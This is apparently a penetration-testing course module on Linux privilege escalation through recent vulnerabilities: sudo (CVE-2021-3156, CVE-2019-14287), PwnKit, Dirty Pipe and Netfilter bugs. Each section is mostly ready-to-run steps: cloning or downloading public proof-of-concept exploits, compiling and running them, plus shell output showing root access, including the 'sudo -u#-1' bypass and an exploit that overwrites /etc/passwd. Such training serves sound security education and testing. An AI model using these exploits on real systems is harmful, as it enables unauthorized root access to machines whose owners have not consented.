Recent 0-Days

Sudo

The program sudo is used under UNIX operating systems like Linux or macOS to start processes with the rights of another user. In most cases, commands are executed that are only available to administrators. It serves as an additional layer of security or a safeguard to prevent the system and its contents from being damaged by unauthorized users. The /etc/sudoers file specifies which users or groups are allowed to run specific programs and with what privileges.

sudo cat /etc/sudoers | grep -v "#" | sed -r '/^\s*$/d'

One of the latest vulnerabilities for sudo carries the CVE-2021-3156 and is based on a heap-based buffer overflow vulnerability. This affected the sudo versions:

• 1.8.31 - Ubuntu 20.04

• 1.8.27 - Debian 10

• 1.9.2 - Fedora 33

• and others

To find out the version of sudo, the following command is sufficient:

sudo -V | head -n1

The interesting thing about this vulnerability was that it had been present for over ten years until it was discovered. There is also a public Proof-Of-Concept that can be used for this. We can either download this to a copy of the target system we have created or, if we have an internet connection, to the target system itself.

git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
make

When running the exploit, we can be shown a list that will list all available versions of the operating systems that may be affected by this vulnerability.

./sudo-hax-me-a-sandwich

We can find out which version of the operating system we are dealing with using the following command:

cat /etc/lsb-release

Next, we specify the respective ID for the version operating system and run the exploit with our payload.

./sudo-hax-me-a-sandwich 1

Sudo Policy Bypass

Another vulnerability was found in 2019 that affected all versions below 1.8.28, which allowed privileges to escalate even with a simple command. This vulnerability has the CVE-2019-14287 and requires only a single prerequisite. It had to allow a user in the /etc/sudoers file to execute a specific command.

sudo -l

User cry0l1t3 may run the following commands on Penny:
    ALL=(ALL) /usr/bin/id

In fact, Sudo also allows commands with specific user IDs to be executed, which executes the command with the user's privileges carrying the specified ID. The ID of the specific user can be read from the /etc/passwd file.

cat /etc/passwd | grep cry0l1t3

cry0l1t3:x:1005:1005:cry0l1t3,,,:/home/cry0l1t3:/bin/bash

Thus the ID for the user cry0l1t3 would be 1005. If a negative ID (-1) is entered at sudo, this results in processing the ID 0, which only the root has. This, therefore, led to the immediate root shell

sudo -u#-1 id

Polkit

PolicyKit (polkit) is an authorization service on Linux-based operating systems that allows user software and system components to communicate with each other if the user software is authorized to do so. To check whether the user software is authorized for this instruction, polkit is asked.

Polkit works with two groups of files.

1. actions/policies (/usr/share/polkit-1/actions)

2. rules (/usr/share/polkit-1/rules.d)

Polkit also has local authority rules which can be used to set or remove additional permissions for users and groups. Custom rules can be placed in the directory /etc/polkit-1/localauthority/50-local.d with the file extension .pkla.

PolKit also comes with three additional programs:

• pkexec - runs a program with the rights of another user or with root rights

• pkaction - can be used to display actions

• pkcheck - this can be used to check if a process is authorized for a specific action

The most interesting tool for us, in this case, is pkexec because it performs the same task as sudo and can run a program with the rights of another user or root.

pkexec -u root id

In the pkexec tool, the memory corruption vulnerability with the identifier CVE-2021-4034 was found, also known as Pwnkit and also leads to privilege escalation. This vulnerability was also hidden for more than ten years, and no one can precisely say when it was discovered and exploited. Finally, in November 2021, this vulnerability was published and fixed two months later.

To exploit this vulnerability, we need to download a PoC and compile it on the target system itself or a copy we have made.

git clone https://github.com/arthepsy/CVE-2021-4034.git
cd CVE-2021-4034
gcc cve-2021-4034-poc.c -o poc

Once we have compiled the code, we can execute it without further ado. After the execution, we change from the standard shell (sh) to Bash (bash) and check the user's IDs.

./poc

Compiling for old glibc versions

This is a "janky" way to compile for old version, which is just statically linking the libraries...

gcc cve-2021-4034-poc.c -o poc -static -static-libgcc

(adds the -static -static-libgcc)

Dirty Pipe

A vulnerability in the Linux kernel, named Dirty Pipe (CVE-2022-0847), allows unauthorized writing to root user files on Linux. Technically, the vulnerability is similar to the Dirty Cow vulnerability discovered in 2016. All kernels from version 5.8 to 5.17 are affected and vulnerable to this vulnerability.

In simple terms, this vulnerability allows a user to write to arbitrary files as long as he has read access to these files. It is also interesting to note that Android phones are also affected. Android apps run with user rights, so a malicious or compromised app could take over the phone.

This vulnerability is based on pipes. Pipes are a mechanism of unidirectional communication between processes that are particularly popular on Unix systems. For example, we could edit the /etc/passwd file and remove the password prompt for the root. This would allow us to log in with the su command without the password prompt.

To exploit this vulnerability, we need to download a PoC and compile it on the target system itself or a copy we have made.

Download Dirty Pipe Exploit

git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git
cd CVE-2022-0847-DirtyPipe-Exploits
bash compile.sh

After compiling the code, we have two different exploits available. The first exploit version (exploit-1) modifies the /etc/passwd and gives us a prompt with root privileges. For this, we need to verify the kernel version and then execute the exploit.

Verify Kernel Version

uname -r

5.13.0-46-generic

Exploitation

./exploit-1

Backing up /etc/passwd to /tmp/passwd.bak ...
Setting root password to "piped"...
Password: Restoring /etc/passwd from /tmp/passwd.bak...
Done! Popping shell... (run commands now)

id

uid=0(root) gid=0(root) groups=0(root)

With the help of the 2nd exploit version (exploit-2), we can execute SUID binaries with root privileges. However, before we can do that, we first need to find these SUID binaries. For this, we can use the following command:

Find SUID Binaries

find / -perm -4000 2>/dev/null

Then we can choose a binary and specify the full path of the binary as an argument for the exploit and execute it.

./exploit-2 /usr/bin/sudo

Netfilter

Netfilter is a Linux kernel module that provides, among other things, packet filtering, network address translation, and other tools relevant to firewalls. It controls and regulates network traffic by manipulating individual packets based on their characteristics and rules. Netfilter is also called the software layer in the Linux kernel. When network packets are received and sent, it initiates the execution of other modules such as packet filters. These modules can then intercept and manipulate packets. This includes the programs like iptables and arptables, which serve as action mechanisms of the Netfilter hook system of the IPv4 and IPv6 protocol stack.

This kernel module has three main functions:

1. Packet defragmentation

2. Connection tracking

3. Network address translation (NAT)

When the module is activated, all IP packets are checked by the Netfilter before they are forwarded to the target application of the own or remote system. In 2021 (CVE-2021-22555), 2022 (CVE-2022-1015), and also in 2023 (CVE-2023-32233), several vulnerabilities were found that could lead to privilege escalation.

Even if the company uses virtual machines or containers like Docker, these are built on a specific kernel. The idea of isolating the software application from the existing host system is a good step, but there are many ways to break out of such a container.

CVE-2021-22555

Vulnerable kernel versions: 2.6 - 5.11

uname -r

5.10.5-051005-generic

wget https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
gcc -m32 -static exploit.c -o exploit
./exploit

CVE-2022-25636

A recent vulnerability is CVE-2022-25636 and affects Linux kernel 5.4 through 5.6.10. This is net/netfilter/nf_dup_netdev.c, which can grant root privileges to local users due to heap out-of-bounds write. Nick Gregory wrote a very detailed article about how he discovered this vulnerability.

uname -r

5.13.0-051300-generic

However, we need to be careful with this exploit as it can corrupt the kernel, and a reboot will be required to reaccess the server.

sudo apt-get install libfuse-dev
sudo apt-get install libmnl-dev
sudo apt-get install libnftnl-dev

git clone https://github.com/Bonfee/CVE-2022-25636.git
cd CVE-2022-25636
make
./exploit

CVE-2023-32233

This vulnerability exploits the so called anonymous sets in nf_tables by using the Use-After-Free vulnerability in the Linux Kernel up to version 6.3.1. These nf_tables are temporary workspaces for processing batch requests and once the processing is done, these anonymous sets are supposed to be cleared out (Use-After-Free) so they cannot be used anymore. Due to a mistake in the code, these anonymous sets are not being handled properly and can still be accessed and modified by the program.

The exploitation is done by manipulating the system to use the cleared out anonymous sets to interact with the kernel's memory. By doing so, we can potentially gain root privileges.

git clone https://github.com/Liuk3r/CVE-2023-32233
cd CVE-2023-32233
gcc -Wall -o exploit exploit.c -lmnl -lnftnl